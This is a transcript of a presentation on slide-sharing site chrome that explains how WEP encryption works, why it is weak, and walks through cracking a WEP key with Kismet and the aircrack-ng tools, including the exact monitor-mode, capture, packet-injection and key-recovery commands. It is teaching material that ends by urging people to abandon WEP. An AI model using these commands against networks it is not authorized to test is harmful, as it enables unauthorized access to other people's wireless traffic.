Presentation is loading. Please wait.

Presentation is loading. Please wait.

The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens."— Presentation transcript:

1 The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens

2 Overview Background and a little history How WEP works WEP’s major weaknesses A short course in wardriving Using kismet to scout out the wireless landscape Zeroing in with the aircrack-ng suite airodump, to capture traffic aireplay, to replay weakly encrypted packets aircrack, to find the key using statistical methods

3 Background & history… Wireless Equivalent Privacy Adopted in 1999 as part of 802.11 standard Later swallowed whole by 802.11b standard Initially, used only 40-bit encryption keys, due to technology export restrictions Later, expanded to 104-bit keys when export restrictions were eased Used 6 times as often as WPA/WPA2 despite known fatal weakness* (85% / 14% / 1%) *Based on a 2006 survey in Seattle area

4 How WEP works 1. Plain text gets CRC-32 checksum appended 2. 24-bit initialization vector pre-pended to key as a seed for RC4 key scheduling algorithm 3. RC4’s pseudo-random generation algorithm outputs keystream 4. Keystream XORed with plain text 5. IV in plain text pre-pended to message 6. On receipt, keystream regenerated and XORed with cipher text to produce plain text

5 WEP’s major weaknesses IV space too small (2 24 ) On a busy network, IVs must repeat in <= 5 hours 50% probability that IV repeats in 5,000 packets RC4 algorithm produces “weak” IVs that can be correctly guessed 5% or 13% of the time No key management; typically just one key IP traffic contains much known plaintext data Open to injected traffic that is rebroadcast

6 Wardriving: Kismet Network detector, sniffer, IDS Works on 802.11b, 802.11a, 802.11g networks Uses passive monitoring, so hard to detect Logs sniffed packets in formats compatible with Wireshark/Tcpdump, Airsnort Channel surfs automatically Optionally, supports GPS for network location

7 Kismet: Install & configure Binary packages available for most systems Requires WiFi adaptor that supports monitor mode as “capture source” Logs traffic in popular formats* Specify source in /etc/kismet/kismet.conf, as driver,device,source_name source=ipw2200,eth1,Stella *Wireshark, Airsnort, etc.

8 Stella, the WiFi attack animal!

9 Wardriving: Recon phase Use Kismet to survey WiFi landscape and to choose a target network Record necessary data for Aircrack attack: Channel number? SSID? Access point MAC address?

10 Wardriving: Kismet

11 Wardriving: Attack phase Aircrack-ng: Software for network detection, sniffing, WEP cracking, and analysis Works on 802.11b, 802.11a, 802.11g Uses passive monitoring & packet injection Main tools aircrack-ng: Cracking airdecap: Packet decryption airmon: Monitor mode switching aireplay: Packet injection (Linux only) airodump: Exports traffic to.cap files

12 Wardriving: Aircrack procedure 1.Bring up adapter on target’s channel in monitor mode: # ifconfig wlan0 up # iwconfig wlan0 mode Monitor channel 9 2.Capture packets to file on channel, IVs only # airodump wlan0./berlin_dump 9 1

13 Wardriving: Airodump

14 Wardriving: Aircrack procedure 3.Find weakly-encrypted packets to replay in interactive mode # aireplay -2 -b 00:14:6C:40:BA:A6 \ -x 512 wlan0 4.Finally, crack WEP key with captured IVs # aircrack -n 64 berlin-dump.ivs

15 Wardriving: Aireplay

16 Wardriving: Aircrack

17 Summary WEP has numerous serious flaws WEP's flaws are thoroughly documented WEP is readily exploitable in a short time, by unskilled attackers, using readily available tools Strong protection is readily available Bottom line: Don't use WEP, period!

18 Questions?

Download ppt "The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens."

Similar presentations

Overview How to crack WEP and WPA

Overview How to crack WEP and WPA
Crack WEP Lab Last Update 2014.08.12 1.1.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Wireless Cracking By: Christopher Zacky.

Wireless Cracking By: Christopher Zacky.
WLAN Security: Cracking WEP/WPA

WLAN Security: Cracking WEP/WPA
WEP 1 WEP WEP 2 WEP  WEP == Wired Equivalent Privacy  The stated goal of WEP is to make wireless LAN as secure as a wired LAN  According to Tanenbaum:

WEP 1 WEP WEP 2 WEP  WEP == Wired Equivalent Privacy  The stated goal of WEP is to make wireless LAN as secure as a wired LAN  According to Tanenbaum:
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.

Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.

1 MD5 Cracking One way hash. Used in online passwords and file verification.
Security flaws of the WEP-Protocol by Bastian Sopora, Seminar Computer Security 2006.

Security flaws of the WEP-Protocol by Bastian Sopora, Seminar Computer Security 2006.
WEP Weaknesses Or “What on Earth does this Protect” Roy Werber.

WEP Weaknesses Or “What on Earth does this Protect” Roy Werber.
Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.

Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.
How To Not Make a Secure Protocol 802.11 WEP Dan Petro.

How To Not Make a Secure Protocol WEP Dan Petro.
W i reless LAN Security Presented by: Pallavi Priyadarshini Student ID 003503527.

W i reless LAN Security Presented by: Pallavi Priyadarshini Student ID
Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP)
Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.

Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.
Kemal AkkayaWireless & Network Security 1 Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture.

Kemal AkkayaWireless & Network Security 1 Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture.
RC4 1 RC4 RC4 2 RC4  Invented by Ron Rivest o “RC” is “Ron’s Code” or “Rivest Cipher”  A stream cipher  Generate keystream byte at a step o Efficient.

RC4 1 RC4 RC4 2 RC4  Invented by Ron Rivest o “RC” is “Ron’s Code” or “Rivest Cipher”  A stream cipher  Generate keystream byte at a step o Efficient.
802.11 Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.

Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
The Final Nail in WEP’s Coffin Andrea Bittau, Mark Handley – University College London Joshua Lackey - Microsoft CPS372 Gordon College.

The Final Nail in WEP’s Coffin Andrea Bittau, Mark Handley – University College London Joshua Lackey - Microsoft CPS372 Gordon College.
15 November 2004 1 Wireless Security Issues Cheyenne Hollow Horn SFS Presentation 2004.

15 November Wireless Security Issues Cheyenne Hollow Horn SFS Presentation 2004.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

Similar presentations

Ads by Google